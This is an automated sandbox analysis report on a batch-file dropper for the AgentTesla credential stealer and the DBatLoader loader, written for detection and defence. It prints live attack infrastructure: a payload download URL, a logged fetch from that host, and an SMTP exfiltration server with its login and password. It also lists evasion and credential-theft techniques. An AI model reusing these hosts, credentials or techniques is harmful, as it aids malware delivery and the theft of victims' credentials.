Windows Analysis Report
RFQ_PO_N39859JFK_ORDER_SPECIFICATIONS_OM.bat

Overview

General Information

Sample name: RFQ_PO_N39859JFK_ORDER_SPECIFICATIONS_OM.bat
Analysis ID: 1560318
MD5: ae6a8a43561ba85215f8b9986001a520
SHA1: 08d50775b58ae5f13b971a674e7799477a5bd00c
SHA256: a0b4998d451f008fd7f752ef86b9a7306684f9193f07db1986273727636da61e
Tags: batuser-lowmal3

Detection

AgentTesla, DBatLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected AgentTesla
Yara detected DBatLoader
.NET source code contains very large strings
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Allocates many large memory chunks
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Drops PE files to the user root directory
Drops PE files with a suspicious file extension
Drops executable to a common third party application directory
Drops or copies cmd.exe with a different name (likely to bypass HIPS)
Found large BAT file
Infects executable files (exe, dll, sys, html)
Installs a global keyboard hook
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Sample uses process hollowing technique
Sigma detected: DLL Search Order Hijacking Via Additional Space in Path
Sigma detected: Execution from Suspicious Folder
Sigma detected: New RUN Key Pointing to Suspicious Folder
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Uses schtasks.exe or at.exe to add and modify task schedules
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains functionality to call native functions
Contains functionality to check if a connection to the internet is available
Contains functionality to dynamically determine API calls
Contains functionality to launch a process as a different user
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates a window with clipboard capturing capabilities
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the user directory
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Execution of Suspicious File Type Extension
Sigma detected: Powershell Defender Exclusion
Sigma detected: Startup Folder File Write
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Outbound SMTP Connections
Sigma detected: Suspicious Schtasks From Env Var Folder
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Uses SMTP (mail sending)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

Name: Agent Tesla, AgentTesla
Description: A .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
Attribution: SWEED
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla

Name: DBatLoader
Description: This Delphi loader misuses Cloud storage services, such as Google Drive, to download the Delphi stager component. The Delphi stager has the actual payload embedded as a resource and starts it.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.dbatloader

AV Detection

Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Avira: detection malicious, Label: HEUR/AGEN.1311721
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Avira: detection malicious, Label: TR/Spy.Gen8
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Avira: detection malicious, Label: HEUR/AGEN.1325995
Source: C:\Users\user\AppData\Local\Temp\x.exe Avira: detection malicious, Label: HEUR/AGEN.1325995
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Avira: detection malicious, Label: HEUR/AGEN.1311721
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe Avira: detection malicious, Label: W32/Infector.Gen
Source: RFQ_PO_N39859JFK_ORDER_SPECIFICATIONS_OM.bat Malware Configuration Extractor: DBatLoader {"Download Url": ["https://gxe0.com/yak/233_Wisrysxlfss"]}
Source: 13.0.neworigin.exe.a60000.0.unpack Malware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Port": "587", "Host": "s82.gocheapweb.com", "Username": "info2@j-fores.com", "Password": "london@1759"}
Source: C:\Users\Public\Libraries\Wisrysxl.PIF ReversingLabs: Detection: 28%
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe ReversingLabs: Detection: 81%
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe ReversingLabs: Detection: 65%
Source: C:\Users\user\AppData\Local\Temp\x.exe ReversingLabs: Detection: 28%
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe ReversingLabs: Detection: 65%
Source: RFQ_PO_N39859JFK_ORDER_SPECIFICATIONS_OM.bat ReversingLabs: Detection: 23%
Source: Submitted Sample Integrated Neural Analysis Model: Matched 99.9% probability
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Joe Sandbox ML: detected
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\x.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe Joe Sandbox ML: detected
Source: unknown HTTPS traffic detected: 198.252.105.91:443 -> 192.168.2.10:49713 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.10:49742 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.10:49775 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.10:49797 version: TLS 1.2
Source: Binary string: E:\Adlice\Truesight\x64\Release\truesight.pdb source: x.exe, 00000004.00000003.1422946376.000000007DF87000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.1537113569.000000007E8C7000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1422946376.000000007DF00000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1424649054.000000007ED80000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: easinvoker.pdb source: x.exe, x.exe, 00000004.00000003.1422946376.000000007DF87000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.1522045362.0000000020D47000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.1537113569.000000007E8C7000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1329954497.000000007FC50000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.1472715771.00000000022E6000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1422946376.000000007DF00000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1424649054.000000007ED80000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.1478188879.0000000002E6E000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.1522045362.0000000020CA3000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1330431133.000000007F920000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: cmd.pdbUGP source: esentutl.exe, 00000008.00000003.1441667884.0000000000AC0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: ping.pdbGCTL source: esentutl.exe, 00000009.00000003.1445817918.0000000005170000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: easinvoker.pdbH source: x.exe, 00000004.00000003.1422946376.000000007DF87000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.1537113569.000000007E8C7000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1422946376.000000007DF00000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1424649054.000000007ED80000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: easinvoker.pdbGCTL source: x.exe, 00000004.00000002.1474717040.00000000028C8000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000004.00000003.1446636535.000000002212F000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000004.00000003.1446636535.00000000220FE000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000004.00000002.1522045362.0000000020D47000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1330164805.00000000028C9000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000004.00000003.1329954497.000000007FC50000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.1472715771.00000000022E6000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.1478188879.0000000002E6E000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.1522045362.0000000020CA3000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1330431133.000000007F920000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: cmd.pdb source: esentutl.exe, 00000008.00000003.1441667884.0000000000AC0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: ping.pdb source: esentutl.exe, 00000009.00000003.1445817918.0000000005170000.00000004.00001000.00020000.00000000.sdmp

Spreading

Source: C:\Users\Public\Libraries\lxsyrsiW.pif System file written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 4_2_02E45908 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA, 4_2_02E45908
Source: C:\Users\Public\Libraries\lxsyrsiW.pif File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\
Source: C:\Users\Public\Libraries\lxsyrsiW.pif File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\UIThemes\
Source: C:\Users\Public\Libraries\lxsyrsiW.pif File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\
Source: C:\Users\Public\Libraries\lxsyrsiW.pif File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\
Source: C:\Users\Public\Libraries\lxsyrsiW.pif File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\
Source: C:\Users\Public\Libraries\lxsyrsiW.pif File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Code function: 4x nop then jmp 00987394h 14_2_00987108
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Code function: 4x nop then jmp 009878DCh 14_2_0098767A
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Code function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h 14_2_00987E60
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Code function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h 14_2_00987E5F
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Code function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h 14_2_00987FBC
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Code function: 4x nop then jmp 065EBCBDh 20_2_065EBA40

Networking

Source: Malware configuration extractor URLs: https://gxe0.com/yak/233_Wisrysxlfss
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 4_2_02E5E4B8 InternetCheckConnectionA, 4_2_02E5E4B8
Source: global traffic TCP traffic: 192.168.2.10:49749 -> 51.195.88.199:587
Source: Joe Sandbox View IP Address: 198.252.105.91 198.252.105.91
Source: Joe Sandbox View IP Address: 104.26.13.205 104.26.13.205
Source: Joe Sandbox View JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox View JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: unknown DNS query: name: api.ipify.org
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.10:49713 -> 198.252.105.91:443
Source: global traffic HTTP traffic detected: GET /yak/233_Wisrysxlfss HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: gxe0.com
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic DNS traffic detected: DNS query: gxe0.com
Source: global traffic DNS traffic detected: DNS query: api.ipify.org
Source: global traffic DNS traffic detected: DNS query: s82.gocheapweb.com
Source: x.exe, 00000004.00000003.1422946376.000000007DF87000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.1537113569.000000007E8C7000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1422946376.000000007DF00000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1424649054.000000007ED80000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: x.exe, 00000004.00000003.1422946376.000000007DF87000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.1537113569.000000007E8C7000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1422946376.000000007DF00000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1424649054.000000007ED80000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: x.exe, 00000004.00000003.1422946376.000000007DF87000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.1537113569.000000007E8C7000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1422946376.000000007DF00000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1424649054.000000007ED80000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: x.exe, 00000004.00000003.1422946376.000000007DF87000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.1537113569.000000007E8C7000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1422946376.000000007DF00000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1424649054.000000007ED80000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
Source: powershell.exe, 00000010.00000002.1551553255.0000000003098000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.micro
Source: x.exe, 00000004.00000003.1422946376.000000007DF87000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.1537113569.000000007E8C7000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1422946376.000000007DF00000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1424649054.000000007ED80000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningCAEVR36.crl0
Source: x.exe, 00000004.00000003.1422946376.000000007DF87000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.1537113569.000000007E8C7000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1422946376.000000007DF00000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1424649054.000000007ED80000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0
Source: x.exe, 00000004.00000003.1422946376.000000007DF87000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.1537113569.000000007E8C7000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1422946376.000000007DF00000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1424649054.000000007ED80000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: x.exe, 00000004.00000003.1422946376.000000007DF87000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.1537113569.000000007E8C7000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1422946376.000000007DF00000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1424649054.000000007ED80000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: x.exe, 00000004.00000003.1422946376.000000007DF87000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.1537113569.000000007E8C7000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1422946376.000000007DF00000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1424649054.000000007ED80000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: x.exe, 00000004.00000003.1422946376.000000007DF87000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.1537113569.000000007E8C7000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1422946376.000000007DF00000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1424649054.000000007ED80000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningCAEVR36.crt0#
Source: x.exe, 00000004.00000003.1422946376.000000007DF87000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.1537113569.000000007E8C7000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1422946376.000000007DF00000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1424649054.000000007ED80000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#
Source: powershell.exe, 00000010.00000002.1607520049.0000000005C0B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
Source: x.exe, 00000004.00000003.1422946376.000000007DF87000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.1537113569.000000007E8C7000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1422946376.000000007DF00000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1424649054.000000007ED80000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://ocsp.comodoca.com0
Source: x.exe, 00000004.00000003.1422946376.000000007DF87000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.1537113569.000000007E8C7000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1422946376.000000007DF00000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1424649054.000000007ED80000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0A
Source: x.exe, 00000004.00000003.1422946376.000000007DF87000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.1537113569.000000007E8C7000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1422946376.000000007DF00000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1424649054.000000007ED80000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0C
Source: x.exe, 00000004.00000003.1422946376.000000007DF87000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.1537113569.000000007E8C7000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1422946376.000000007DF00000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1424649054.000000007ED80000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0X
Source: x.exe, 00000004.00000003.1422946376.000000007DF87000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.1537113569.000000007E8C7000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1422946376.000000007DF00000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1424649054.000000007ED80000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://ocsp.sectigo.com0
Source: x.exe, 00000004.00000003.1422946376.000000007DF87000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.1537113569.000000007E8C7000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1422946376.000000007DF00000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1424649054.000000007ED80000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://ocsp.sectigo.com0C
Source: powershell.exe, 00000010.00000002.1555969400.0000000004CF5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: neworigin.exe, 0000000D.00000002.1598666321.00000000012FD000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.1598666321.00000000012A2000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.1624352397.0000000002DC3000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3790934046.0000000002C61000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3790934046.0000000002DF8000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3790934046.0000000002F2C000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3790934046.000000000301E000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3839347953.00000000066FA000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3839519274.0000000006710000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3838990479.00000000066E6000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3834255661.0000000005550000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3790934046.0000000002D16000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3790934046.0000000002DC5000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3790934046.0000000002E8F000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3781994607.00000000010C7000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3790934046.0000000002CBB000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3781994607.0000000001036000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3840124284.000000000672F000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3790934046.00000000030BD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://r11.i.lencr.org/0
Source: neworigin.exe, 0000000D.00000002.1598666321.00000000012FD000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.1598666321.00000000012A2000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.1624352397.0000000002DC3000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3790934046.0000000002C61000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3790934046.0000000002DF8000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3790934046.0000000002F2C000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3790934046.000000000301E000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3839347953.00000000066FA000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3839519274.0000000006710000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3838990479.00000000066E6000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3834255661.0000000005550000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3790934046.0000000002D16000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3790934046.0000000002DC5000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3790934046.0000000002E8F000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3781994607.00000000010C7000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3790934046.0000000002CBB000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3781994607.0000000001036000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3840124284.000000000672F000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3790934046.00000000030BD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://r11.o.lencr.org0#
Source: neworigin.exe, 0000000D.00000002.1624352397.0000000002DBB000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.1624352397.0000000002F65000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3790934046.0000000002DF8000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3790934046.0000000002F2C000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3790934046.000000000301E000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3790934046.0000000002CFA000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3790934046.0000000002DC5000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3790934046.0000000002E8F000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3790934046.00000000030BD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://s82.gocheapweb.com
Source: powershell.exe, 00000010.00000002.1555969400.0000000004CF5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: neworigin.exe, 0000000D.00000002.1624352397.0000000002D41000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1555969400.0000000004BA1000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3790934046.0000000002BAC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000010.00000002.1555969400.0000000004CF5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: powershell.exe, 00000010.00000002.1555969400.0000000004CF5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: x.exe, x.exe, 00000004.00000002.1532108594.000000002215C000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000004.00000002.1551725897.000000007FAAF000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.1474717040.0000000002969000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000004.00000003.1330164805.000000000296A000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000004.00000002.1533707068.00000000224BF000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.1478188879.0000000002E6E000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.1522045362.0000000020CA3000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.1522045362.0000000020D24000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1330431133.000000007F920000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.1532108594.00000000220FC000.00000004.00000020.00020000.00000000.sdmp, lxsyrsiW.pif, 0000000C.00000000.1460918263.0000000000416000.00000002.00000001.01000000.00000007.sdmp, Wisrysxl.PIF, 0000001A.00000002.1609735089.0000000002FA2000.00000004.00001000.00020000.00000000.sdmp, lxsyrsiW.pif, 0000001C.00000000.1577974384.0000000000416000.00000002.00000001.01000000.00000007.sdmp String found in binary or memory: http://www.pmail.com
